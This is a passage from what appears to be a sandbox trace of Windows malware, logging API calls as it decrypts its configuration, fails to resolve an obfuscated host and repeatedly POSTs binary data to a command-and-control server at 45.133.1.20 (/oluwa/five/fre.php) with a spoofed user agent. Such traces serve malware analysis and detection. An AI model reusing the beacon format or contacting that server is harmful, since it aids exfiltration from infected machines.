param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.432] GetProcessHeap () returned 0x6a0000 [0284.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0284.432] GetProcessHeap () returned 0x6a0000 [0284.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.432] GetProcessHeap () returned 0x6a0000 [0284.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0284.432] GetProcessHeap () returned 0x6a0000 [0284.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0284.433] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.434] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.434] GetProcessHeap () returned 0x6a0000 [0284.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0284.434] GetProcessHeap () returned 0x6a0000 [0284.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.435] send (s=0xa68, buf=0x6bd460*, len=242, flags=0) returned 242 [0284.435] send (s=0xa68, buf=0x6bb998*, len=159, flags=0) returned 159 [0284.436] GetProcessHeap () returned 0x6a0000 [0284.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0284.436] recv (in: s=0xa68, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0284.509] GetProcessHeap () returned 0x6a0000 [0284.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0284.509] GetProcessHeap () returned 0x6a0000 [0284.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0284.510] GetProcessHeap () returned 0x6a0000 [0284.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0284.510] GetProcessHeap () returned 0x6a0000 [0284.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0284.511] closesocket (s=0xa68) returned 0 [0284.511] GetProcessHeap () returned 0x6a0000 [0284.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0284.511] GetProcessHeap () returned 0x6a0000 [0284.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.512] GetProcessHeap () returned 0x6a0000 [0284.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0284.512] GetProcessHeap () returned 0x6a0000 [0284.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0284.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2f8) returned 0xa68 [0284.517] Sleep (dwMilliseconds=0xea60) [0284.518] GetProcessHeap () returned 0x6a0000 [0284.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0284.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.528] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0284.539] GetProcessHeap () returned 0x6a0000 [0284.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.540] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0284.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.556] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.557] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.557] GetProcessHeap () returned 0x6a0000 [0284.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0284.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.561] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0284.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.562] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0284.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.563] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0284.563] GetProcessHeap () returned 0x6a0000 [0284.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.565] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.566] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.567] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.569] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.569] GetProcessHeap () returned 0x6a0000 [0284.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0284.569] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.569] GetProcessHeap () returned 0x6a0000 [0284.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0284.569] GetProcessHeap () returned 0x6a0000 [0284.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.571] GetProcessHeap () returned 0x6a0000 [0284.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0284.572] GetProcessHeap () returned 0x6a0000 [0284.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0284.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0284.591] GetProcessHeap () returned 0x6a0000 [0284.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.592] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0284.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.593] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.594] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.594] GetProcessHeap () returned 0x6a0000 [0284.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0284.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.596] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0284.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.597] CryptDestroyKey (hKey=0x6ad020) returned 1 [0284.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.599] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0284.599] GetProcessHeap () returned 0x6a0000 [0284.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.600] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0284.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.601] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0284.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.605] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0284.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.606] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0284.606] GetProcessHeap () returned 0x6a0000 [0284.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0284.606] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0284.606] GetProcessHeap () returned 0x6a0000 [0284.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0284.606] socket (af=2, type=1, protocol=6) returned 0xa6c [0284.607] connect (s=0xa6c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0284.634] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0284.634] GetProcessHeap () returned 0x6a0000 [0284.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0284.634] GetProcessHeap () returned 0x6a0000 [0284.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0284.634] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.640] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.640] GetProcessHeap () returned 0x6a0000 [0284.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0284.640] GetProcessHeap () returned 0x6a0000 [0284.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.640] GetProcessHeap () returned 0x6a0000 [0284.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0284.640] GetProcessHeap () returned 0x6a0000 [0284.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0284.642] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.643] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.643] GetProcessHeap () returned 0x6a0000 [0284.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0284.643] GetProcessHeap () returned 0x6a0000 [0284.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.644] send (s=0xa6c, buf=0x6bd460*, len=242, flags=0) returned 242 [0284.645] send (s=0xa6c, buf=0x6bb998*, len=159, flags=0) returned 159 [0284.645] GetProcessHeap () returned 0x6a0000 [0284.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0284.645] recv (in: s=0xa6c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0284.718] GetProcessHeap () returned 0x6a0000 [0284.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0284.720] GetProcessHeap () returned 0x6a0000 [0284.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0284.720] GetProcessHeap () returned 0x6a0000 [0284.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0284.721] GetProcessHeap () returned 0x6a0000 [0284.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0284.721] closesocket (s=0xa6c) returned 0 [0284.730] GetProcessHeap () returned 0x6a0000 [0284.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0284.730] GetProcessHeap () returned 0x6a0000 [0284.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.731] GetProcessHeap () returned 0x6a0000 [0284.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0284.731] GetProcessHeap () returned 0x6a0000 [0284.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0284.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x139c) returned 0xa6c [0284.733] Sleep (dwMilliseconds=0xea60) [0284.742] GetProcessHeap () returned 0x6a0000 [0284.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0284.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.765] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0284.785] GetProcessHeap () returned 0x6a0000 [0284.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0284.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.794] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0284.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.795] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.797] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.797] GetProcessHeap () returned 0x6a0000 [0284.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0284.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.799] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0284.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.833] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0284.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.841] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0284.841] GetProcessHeap () returned 0x6a0000 [0284.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.842] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.843] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.848] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.860] GetProcessHeap () returned 0x6a0000 [0284.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0284.860] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.861] GetProcessHeap () returned 0x6a0000 [0284.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0284.863] GetProcessHeap () returned 0x6a0000 [0284.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.863] GetProcessHeap () returned 0x6a0000 [0284.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0284.864] GetProcessHeap () returned 0x6a0000 [0284.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0284.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.924] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.938] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0284.992] GetProcessHeap () returned 0x6a0000 [0284.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.994] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0284.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.995] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.002] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.002] GetProcessHeap () returned 0x6a0000 [0285.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0285.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.004] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0285.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.006] CryptDestroyKey (hKey=0x6ad020) returned 1 [0285.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.008] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0285.008] GetProcessHeap () returned 0x6a0000 [0285.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.009] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0285.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.016] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0285.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.018] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0285.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.019] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0285.019] GetProcessHeap () returned 0x6a0000 [0285.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0285.019] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0285.019] GetProcessHeap () returned 0x6a0000 [0285.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0285.019] socket (af=2, type=1, protocol=6) returned 0xa70 [0285.020] connect (s=0xa70, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0285.049] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0285.049] GetProcessHeap () returned 0x6a0000 [0285.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0285.050] GetProcessHeap () returned 0x6a0000 [0285.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0285.050] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.051] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.052] GetProcessHeap () returned 0x6a0000 [0285.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0285.052] GetProcessHeap () returned 0x6a0000 [0285.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.052] GetProcessHeap () returned 0x6a0000 [0285.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0285.053] GetProcessHeap () returned 0x6a0000 [0285.053] RtlAllocateHeap (HeapHandle=0x6a0000, 